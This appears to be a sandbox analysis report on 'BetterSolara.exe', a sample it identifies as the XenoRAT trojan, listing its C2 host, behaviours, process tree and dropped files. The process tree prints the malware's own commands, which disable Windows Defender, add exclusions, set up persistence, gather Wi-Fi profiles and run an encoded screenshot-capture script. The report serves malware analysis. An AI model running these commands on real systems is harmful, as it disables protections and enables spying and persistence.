Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-05-2024 16:37

General

  • Target

    BetterSolara.exe

  • Size

    16.7MB

  • MD5

    3934847f717f78cf77739e4000f3eb05

  • SHA1

    6c567b0e3a2779836988bc331b9ac3cec928930e

  • SHA256

    3cb38b6703b6de0b6d3ccd9c600c217b497d694f7c76566cc38f5a518848306e

  • SHA512

    ac049def2ca4875abf560fead264b3599ec0cf476c911ab8b5d93ecdb2f4b0e828a07a18253bbd7c67914b53d1c6c594f8093e0b45252de8c606662da6c56b58

  • SSDEEP

    393216:Y/m3wnMS9DKfopmskhjDd8Bcq1GX4yKQ4x6XEdrme:Y/cSdUopm5dqBBUVT46Use

Malware Config

Extracted

Family

xenorat

C2

taking-headquarters.gl.at.ply.gg

Mutex

Xeno_rat_nd8912d

Attributes
  • install_path

    appdata

  • port

    3069

  • startup_name

    Console

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BetterSolara.exe
    "C:\Users\Admin\AppData\Local\Temp\BetterSolara.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
        cd57e4c171d6e8f5ea8b8f824a6a7316.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:2068
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
        cd57e4c172d6e8f5ea8b8f824a6a7316.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Users\Admin\AppData\Roaming\XenoManager\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
          "C:\Users\Admin\AppData\Roaming\XenoManager\cd57e4c172d6e8f5ea8b8f824a6a7316.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2096
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /Create /TN "Console" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4C4B.tmp" /F
            5⤵
            • Creates scheduled task(s)
            PID:1052
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /query /v /fo csv
            5⤵
              PID:2720
            • C:\Windows\SysWOW64\schtasks.exe
              "schtasks.exe" /delete /tn "\Console" /f
              5⤵
                PID:3416
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\XenoManager\cd57e4c172d6e8f5ea8b8f824a6a7316.exe"
                5⤵
                  PID:2220
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
              cd57e4c271d6e8f5ea8b8f824a6a7316.exe
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Adds Run key to start application
              • Maps connected drives based on registry
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2032
              • C:\Windows\system32\attrib.exe
                attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
                4⤵
                • Views/modifies file attributes
                PID:4612
              • C:\Windows\system32\attrib.exe
                attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                4⤵
                • Views/modifies file attributes
                PID:3224
              • C:\Windows\System32\Wbem\wmic.exe
                wmic csproduct get UUID
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4948
              • C:\Windows\System32\Wbem\wmic.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3032
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:688
              • C:\Windows\System32\Wbem\wmic.exe
                wmic os get Caption
                4⤵
                  PID:4396
                • C:\Windows\System32\Wbem\wmic.exe
                  wmic cpu get Name
                  4⤵
                    PID:1536
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2168
                  • C:\Windows\System32\Wbem\wmic.exe
                    wmic path win32_VideoController get name
                    4⤵
                    • Detects videocard installed
                    PID:4084
                  • C:\Windows\System32\Wbem\wmic.exe
                    wmic csproduct get UUID
                    4⤵
                      PID:3704
                    • C:\Windows\system32\attrib.exe
                      attrib -r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:3804
                    • C:\Windows\system32\attrib.exe
                      attrib +r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:4060
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profiles
                      4⤵
                        PID:4612
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of WriteProcessMemory
                        PID:4820
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.cmdline"
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1748
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES59A9.tmp" "c:\Users\Admin\AppData\Local\Temp\gntaur1q\CSCEBC7FD232D7C478BAE43FE8039FC7AA5.TMP"
                            6⤵
                              PID:4320
                  • C:\Windows\System32\rundll32.exe
                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    1⤵
                      PID:4684

                    Network

                    MITRE ATT&CK Matrix ATT&CK v13

                    Execution

                    Command and Scripting Interpreter

                    1
                    T1059

                    PowerShell

                    1
                    T1059.001

                    Scheduled Task/Job

                    1
                    T1053

                    Persistence

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Scheduled Task/Job

                    1
                    T1053

                    Privilege Escalation

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Scheduled Task/Job

                    1
                    T1053

                    Defense Evasion

                    Virtualization/Sandbox Evasion

                    1
                    T1497

                    Modify Registry

                    2
                    T1112

                    Subvert Trust Controls

                    1
                    T1553

                    Install Root Certificate

                    1
                    T1553.004

                    Hide Artifacts

                    1
                    T1564

                    Hidden Files and Directories

                    1
                    T1564.001

                    Credential Access

                    Unsecured Credentials

                    3
                    T1552

                    Credentials In Files

                    3
                    T1552.001

                    Discovery

                    Query Registry

                    4
                    T1012

                    Virtualization/Sandbox Evasion

                    1
                    T1497

                    System Information Discovery

                    6
                    T1082

                    Peripheral Device Discovery

                    1
                    T1120

                    Collection

                    Data from Local System

                    3
                    T1005

                    Command and Control

                    Web Service

                    1
                    T1102

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      944B

                      MD5

                      77d622bb1a5b250869a3238b9bc1402b

                      SHA1

                      d47f4003c2554b9dfc4c16f22460b331886b191b

                      SHA256

                      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                      SHA512

                      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      944B

                      MD5

                      15dde0683cd1ca19785d7262f554ba93

                      SHA1

                      d039c577e438546d10ac64837b05da480d06bf69

                      SHA256

                      d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                      SHA512

                      57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                    • C:\Users\Admin\AppData\Local\Temp\RES59A9.tmp
                      Filesize

                      1KB

                      MD5

                      d74b506bc7657ff450268733bf5cbe56

                      SHA1

                      ca24a560fd65daf08003681f2f0bad69b0eca14a

                      SHA256

                      22d652f6c395dccdd0c738298ea99a199d454dcd2e1573f8340494bd912a61c5

                      SHA512

                      0ec813aeaa4cd94907f6dbe041923392316eeba2b14edfc413cf75971449bb5ebe7bd194239bf47c84661d5b35835add81b360c4c4a73218409ea34e3781cf9b

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Microsoft.Web.WebView2.Core.dll
                      Filesize

                      488KB

                      MD5

                      851fee9a41856b588847cf8272645f58

                      SHA1

                      ee185a1ff257c86eb19d30a191bf0695d5ac72a1

                      SHA256

                      5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca

                      SHA512

                      cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Microsoft.Web.WebView2.Wpf.dll
                      Filesize

                      43KB

                      MD5

                      34ec990ed346ec6a4f14841b12280c20

                      SHA1

                      6587164274a1ae7f47bdb9d71d066b83241576f0

                      SHA256

                      1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409

                      SHA512

                      b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc
                      Filesize

                      139B

                      MD5

                      d0104f79f0b4f03bbcd3b287fa04cf8c

                      SHA1

                      54f9d7adf8943cb07f821435bb269eb4ba40ccc2

                      SHA256

                      997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a

                      SHA512

                      daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\hasown\.eslintrc
                      Filesize

                      43B

                      MD5

                      c28b0fe9be6e306cc2ad30fe00e3db10

                      SHA1

                      af79c81bd61c9a937fca18425dd84cdf8317c8b9

                      SHA256

                      0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641

                      SHA512

                      e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\hasown\.nycrc
                      Filesize

                      216B

                      MD5

                      c2ab942102236f987048d0d84d73d960

                      SHA1

                      95462172699187ac02eaec6074024b26e6d71cff

                      SHA256

                      948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a

                      SHA512

                      e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\vary\LICENSE
                      Filesize

                      1KB

                      MD5

                      13babc4f212ce635d68da544339c962b

                      SHA1

                      4881ad2ec8eb2470a7049421047c6d076f48f1de

                      SHA256

                      bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400

                      SHA512

                      40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\VCRUNTIME140.dll
                      Filesize

                      99KB

                      MD5

                      7a2b8cfcd543f6e4ebca43162b67d610

                      SHA1

                      c1c45a326249bf0ccd2be2fbd412f1a62fb67024

                      SHA256

                      7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f

                      SHA512

                      e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\WebView2Loader.dll
                      Filesize

                      133KB

                      MD5

                      a0bd0d1a66e7c7f1d97aedecdafb933f

                      SHA1

                      dd109ac34beb8289030e4ec0a026297b793f64a3

                      SHA256

                      79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36

                      SHA512

                      2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Wpf.Ui.dll
                      Filesize

                      5.2MB

                      MD5

                      aead90ab96e2853f59be27c4ec1e4853

                      SHA1

                      43cdedde26488d3209e17efff9a51e1f944eb35f

                      SHA256

                      46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed

                      SHA512

                      f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bin\path.txt
                      Filesize

                      33B

                      MD5

                      7207978deac3d2df817c0efb6de01f45

                      SHA1

                      1b547cb35c2e709dcf4132452cdb5b6ccd66044f

                      SHA256

                      14056051c638d943e3f6cd8ae99b7b8b8b4419f6e6193861081e519eeb4dc808

                      SHA512

                      d38226a5eb755aafe7e8e3d707b00841aea985bd8dedf20556800f1bb7ac7c807fa195bdd1e21014087f89b319ab278bec922951b7c682e9edd3fbee147834ed

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.dll
                      Filesize

                      5.2MB

                      MD5

                      8516475948d5cc69f60965d650b85a00

                      SHA1

                      c9558af61af110cec85c6477f4d5872acc9d40c0

                      SHA256

                      5037e6c632f221686441ac6fe141a5812c8557588baafc5966b748805dc6944a

                      SHA512

                      16b8b01473cb7600a64c51a51905e3a3d12408a251186b97c22698e3d9c051f46d3735db4fb7fe9040f00c55d2767be5b2c609bb0dfa8b63b1ef5d5aa20f2876

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                      Filesize

                      85KB

                      MD5

                      f8f4522d11178a26e97e2046f249dfa7

                      SHA1

                      8b591d9a37716e235260fb6b3f601e4ccbebf15d

                      SHA256

                      3c372a8919c28dc76414b2f30da423c3e1018b1a8444527949ce20cc3fc93ed0

                      SHA512

                      52ea881cad501cf1d5e8ac47355e862ac1bd39cb6e1ff3d362d392b6f2d676e74878832505d17a552aaa3bc8f3977da11fa3f9903722eedd23716fb46ddb7492

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension State\CURRENT
                      Filesize

                      16B

                      MD5

                      46295cac801e5d4857d09837238a6394

                      SHA1

                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                      SHA256

                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                      SHA512

                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001
                      Filesize

                      41B

                      MD5

                      5af87dfd673ba2115e2fcf5cfdb727ab

                      SHA1

                      d5b5bbf396dc291274584ef71f444f420b6056f1

                      SHA256

                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                      SHA512

                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index
                      Filesize

                      24B

                      MD5

                      54cb446f628b2ea4a5bce5769910512e

                      SHA1

                      c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                      SHA256

                      fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                      SHA512

                      8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_0
                      Filesize

                      8KB

                      MD5

                      cf89d16bb9107c631daabf0c0ee58efb

                      SHA1

                      3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                      SHA256

                      d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                      SHA512

                      8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_1
                      Filesize

                      264KB

                      MD5

                      f50f89a0a91564d0b8a211f8921aa7de

                      SHA1

                      112403a17dd69d5b9018b8cede023cb3b54eab7d

                      SHA256

                      b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                      SHA512

                      bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_2
                      Filesize

                      8KB

                      MD5

                      0962291d6d367570bee5454721c17e11

                      SHA1

                      59d10a893ef321a706a9255176761366115bedcb

                      SHA256

                      ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                      SHA512

                      f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_3
                      Filesize

                      8KB

                      MD5

